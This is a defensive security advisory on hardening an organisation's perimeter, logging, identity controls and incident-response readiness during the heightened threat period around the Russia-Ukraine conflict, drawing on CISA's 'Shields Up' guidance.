The world has watched as the conflict unfolded in Ukraine. With the messaging from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and other government entities around the world flagging organizations to enter a full “Shields Up” approach, the information security community continues to watch for fallout from the ever-changing conflict between Russia and Ukraine.
CISA has provided some key things to focus on, highlighting areas that may be targeted due to the conflict. As the world continues to prepare for cyber warfare, organizations that are not directly tied to or located in Ukraine should still consider following CISA’s direction to maintain heightened security measures—starting immediately.
During this heightened security period, your incident response team efforts will likely need to function at a speed you’ve never experienced before. The key is to not panic, and understand, given the state of things, you likely will not be able to stop an incident from happening. But doing the heavy lifting now can help you detect and slow down attackers.
Start with Your External Perimeter and Work Inward
This is a solid sequence of events to implement:
- Validate your IP space and externally facing footprint. This should always be a priority, but is now more crucial than ever. If you aren’t actively looking for ways in, someone else is, and this isn’t the best time to find out someone has knocked the door down. Verify you know about all of your entry points, including:
- Cloud technology (e.g., M365, web portals to VDI environments, password reset ports)
- Third-party applications
- VPN/RDP/VDI entry points
- Bring Your Own Device (BYOD). This is a great time to double-check the access BYOD devices have within your environment and the type of data and telemetry you’ll be able to gather in the event of an intrusion.
- Do these systems have endpoint detection and response (EDR) insights? If this is not possible, consider leveraging other user behavior analytics tools to identify BYOD devices operating outside of what their normal business operational responsibilities would be.
- Is there a way to associate BYOD devices with end users via a Mobile Device Management (MDM) tool or other means in the event of suspicious activity?
- Verify that all external services have some type of multi-factor authentication (MFA) enabled. MFA provides an added layer of security for these entry points. Given the heightened security, this is a great time to disable push notifications. Attackers have been known to abuse push notifications by spamming authentication attempts, luring the user into unwittingly performing this authentication step for the attacker.
- Consider adding an extra step to your password reset or MFA enrollment process. A number of organizations allow helpdesk/call center teams to assist users in password resets and enrolling new devices for MFA. Consider adding a “call back” process to establish that the individual calling is in fact the individual who owns the account.
- Verify that all network communications are flowing through network security appliances. Validate that your environment has a strong network barrier to the greater internet. Start by verifying that domain controllers and other servers do not have access to the internet. Verify that all network traffic is flowing through the firewall, including VPN traffic. If a proxy is leveraged within the environment, verify that all devices are required to use the proxy, and again, that traffic is flowing through the firewall.
Once that visibility and additional controls are put into place, take a serious look at the logging capabilities throughout your environment.
Verify Proper Logging and Monitoring
Top areas to consider here include:
- Firewalls. Verify that the logs are tracking the bytes transferred in and out; source IP; destination IP; ports; and if possible, URIs/user agents, and so on.
- VPNs. Verify that the source IPs are being captured in the logs. It’s important to track where logins are coming from. Also, verify that the destination IPs, or the hosts internal to the network, are logged.
- MFA/device additions. Verify logs that show when new devices have been enrolled in MDMs, along with associated hostnames and system info, as well as devices that have been enrolled for user MFA.
- DNS and DHCP. Verify these both are logging to a centralized server, but also that the retention for these logs have been increased. These logs, when captured on endpoints only, will expire quickly.
- Proxy logs. Verify URIs are being captured, and if possible, that SSL/TLS communications are being inspected. This can help uncover encrypted communications levered by attackers for command and control.
- DMZ (if applicable). Logging these will help identify if DMZ systems are initiating outbound communications. This, ideally, shouldn’t be happening, but depending on the environment, file transfers and things like email and web servers may generate this traffic. Verify behavior against historical norms.
Internal Areas to Track
Don't forget the danger to your internal systems, including:
- Active Directory. Verify that your user base has been audited for over-privileged users, that inactive users have been disabled, and that old users and computer objects have been removed.
- Passwords. Enforce password complexity and limit reuse of passwords. Verify that you have a process in place to perform an enterprise password reset if necessary. Develop that plan, including proper communications protocols, if this process doesn’t exist.
- Containment. Identify a way to perform both network isolation and host isolation within the network to contain suspicious activity—ideally without losing visibility for forensics and threat hunting. Have a process to isolate with a tool (such as EDR) or a formal process to move systems to an isolated network.
- Command line/script logging. PowerShell logging has become more and more robust over the years, and provides a wealth of knowledge. Similarly, command-line logging can highlight the use of Living off the Land (LOTL) attacks. These have been a favorite of not only actors who perform cyber espionage, but for ransomware affiliates. Check out this presentation by Daniel Bohannon and Matthew Dunwoody that walks through how to create some well thought out security processes that detect methodology-based attacks like LOTL, rather than relying solely on signature based detections that most antivirus (AV) and other security tools are leveraging.
- Create a list of what’s allowed and should be considered normal within the environment. Windows Defender Application Control is effective for Windows environments. For Linux environments, auditd can be leveraged for continuous monitoring. EDR tools can also leverage components to help with this monitoring.
Consider taking a very conservative approach to what is allowed in and out of the network. LOTL attacks are designed to bypass AV tools, and are also effective at bypassing other security tools like EDR.
They also allow an attacker to blend in with the rest of the environment, because they use the operating system in atypical ways that aren’t exploiting or using malware to carry out attackers’ actions. Taking a conservative approach will not only help limit the attack surface during this heightened security time, but will also help identify new suspicious activity within the environment.
Look Into Insurance
Finally, consider discussing with cyber insurance about the different options available, including what’s covered; what priority your organization will have in case of attack; and what incident response (IR) vendors are available to you.
Unfortunately, for the foreseeable future, the volume of cyber-related incidents will likely be overwhelming. Having these serious talks now will aid in the long run.